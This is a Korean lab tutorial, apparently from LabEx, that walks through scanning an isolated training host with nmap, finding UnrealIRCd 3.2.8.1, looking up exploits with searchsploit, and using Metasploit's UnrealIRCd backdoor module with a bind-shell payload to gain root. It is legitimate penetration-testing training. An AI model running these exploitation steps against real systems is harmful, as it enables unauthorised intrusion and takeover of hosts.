소개
네트워크 스캔은 매우 실무적인 분야입니다. 네트워크 스캔을 통해 사용자는 대상 호스트의 다양한 서비스에 할당된 포트, 열려 있는 서비스, 서비스 소프트웨어 및 버전 정보 등을 파악할 수 있습니다.
이번 실습에서는 대상 호스트의 네트워크 서비스 보안 취약점을 스캔하는 방법을 배웁니다.
대상 호스트의 열린 포트 스캔하기
네트워크 스캔의 기본적인 작업 흐름은 다음과 같습니다:
- 대상 호스트 발견
- 포트 스캔
- 핑거프린트 정보 스캔
- 취약점 스캔
- 모의 해킹 수행
Nmap(Network Mapper)은 강력한 네트워크 스캔 도구입니다. UDP, TCP connect(), TCP SYN(하프 오픈 스캔), FTP 프록시(바운스 공격), 리버스 플래그, ICMP, FIN, ACK 스캔, SYN 스캔, 널 스캔 등 다양한 스캔 기법을 지원합니다.
이 단계에서는 Nmap을 사용하여 대상 호스트의 열린 포트를 스캔합니다. 실습 환경에는 이미 192.168.122.102에서 취약한 훈련용 서비스가 실행 중이므로, 대상이 다운되었다고 보고되는 대신 활성 호스트가 발견되어야 합니다.
- 터미널을 열고 Kali 컨테이너로 진입합니다:
docker run -ti --network host b5b709a49cd5 bash
nmap명령어를 사용하여 대상 호스트 192.168.122.102를 스캔합니다:
nmap -p 6667 -T4 -A -v 192.168.122.102 > /tmp/report.txt
이 명령어는 대상 호스트의 6667 포트를 스캔하고, 더 빠른 타이밍 정책을 사용하며, 버전 탐지를 활성화하고, 결과를 /tmp/report.txt에 저장합니다.
스캔 결과 분석하기
대상 호스트를 스캔한 후에는 스캔 결과를 분석하여 잠재적인 취약점을 식별해야 합니다.
- 스캔 보고서를 확인합니다:
cat /tmp/report.txt
이 명령어는 대상 호스트의 열린 포트, 서비스 및 버전 정보가 포함된 /tmp/report.txt 파일의 내용을 표시합니다. 성공적인 스캔이라면 호스트가 활성 상태이고 6667 포트가 열려 있음을 보여주며, 다음 예시와 유사하게 출력됩니다:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 15:28 UTC
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Discovered open port 6667/tcp on 192.168.122.102
Nmap scan report for 192.168.122.102
Host is up.
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd 3.2.8.1
Service Info: Host: labex-target
searchsploit도구를 사용하여 취약점 정보를 검색합니다:
searchsploit unreal ircd
이 명령어는 Exploit Database에서 "unreal ircd" 서비스와 관련된 취약점을 검색합니다. 출력 결과는 다음과 같을 수 있습니다:
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
- 취약점의 세부 정보를 확인합니다:
cat /usr/share/exploitdb/exploits/linux/remote/16922.rb
이 명령어는 /usr/share/exploitdb/exploits/linux/remote/16922.rb에 위치한 취약점 공격 파일의 내용을 표시합니다.
취약점 공격하기
스캔 결과를 분석하고 잠재적인 취약점을 식별한 후에는 모의 해킹을 위해 취약점 공격을 시도할 수 있습니다.
스캔 결과에서 공격 가능한 취약점을 식별합니다. 예를 들어, 스캔 결과에서 취약한 서비스가 실행 중인 6667 포트가 발견되었다고 가정합니다.
Metasploit Framework를 시작합니다:
cd ~
msfconsole
- Metasploit 콘솔에서 적절한 공격 모듈을 선택합니다:
use exploit/unix/irc/unreal_ircd_3281_backdoor
- 대상 호스트 IP 주소를 설정합니다:
set RHOST 192.168.122.102
- 페이로드를 설정합니다:
set PAYLOAD cmd/unix/bind_perl
- 공격을 실행합니다:
exploit
공격이 성공하면 대상 호스트에 대한 접근 권한을 얻게 됩니다.
- 취약점 공격을 시도한 후에는 공격이 성공했는지 확인해야 합니다. Metasploit 세션에서 현재 사용자와 호스트 이름을 확인합니다:
whoami
hostname
출력 결과가 root 사용자로 로그인되었음을 보여준다면 공격은 성공한 것입니다. 이 실습에서 취약한 서비스는 훈련용 VM 내의 격리된 네트워크 네임스페이스에서 실행되므로, hostname 출력은 별도의 게스트 머신 이름이 아닌 현재 LabEx VM의 호스트 이름을 보여줍니다.
Ctrl+D를 눌러 Metasploit 콘솔을 종료한 후 검사를 시작하세요.
요약
이번 실습에서는 대상 호스트 발견, 포트 스캔, 핑거프린트 정보 스캔, 취약점 스캔, 모의 해킹 수행을 포함하는 네트워크 스캔의 기본 작업 흐름을 배웠습니다. 강력한 Nmap 도구를 사용하여 대상 호스트의 열린 포트를 스캔하고, 스캔 결과를 분석하여 잠재적인 취약점을 식별했습니다. 또한 searchsploit 도구를 사용하여 취약점 정보를 검색하는 방법과 Metasploit Framework를 사용하여 취약점을 공격하는 방법을 익혔습니다. 마지막으로 대상 호스트의 현재 사용자와 호스트 이름을 확인하여 공격 성공 여부를 검증했습니다.
이 실습을 통해 네트워크 서비스 보안 취약점을 스캔하고 모의 해킹을 수행하는 실무 경험을 쌓았습니다. 이러한 지식은 네트워크 시스템의 보안을 보장하고 잠재적인 위험을 식별하는 데 매우 중요합니다.
